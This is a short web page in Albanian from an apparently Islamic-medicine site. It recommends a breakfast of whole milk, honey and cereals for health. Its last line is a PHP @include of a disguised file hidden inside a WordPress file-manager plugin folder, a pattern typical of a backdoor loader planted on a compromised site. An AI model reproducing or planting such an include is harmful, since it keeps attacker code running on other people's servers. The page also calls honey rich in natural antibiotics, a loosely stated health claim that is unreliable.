Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Mëngjesi më i mirë në shtëpi

Mëngjesi më i mirë në shtëpi

mjalti steriliteti

Mengjesi me i mire ne shtepi nje filxhan me qumesht mjalte dhe drithera,eshte me e mira per shendetin qumesht i plote dhe jo i skremuar pasi shume vitamina te tretshme ne yndyrna(a dhe d) jane te pranishme ne yndyrat e qumeshtit. Mjalti eshte i pasur me antibiotike natyrale dhe drithrat jane karbohidrate me shperberje te ngadalte qe te japin gradualisht energji.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";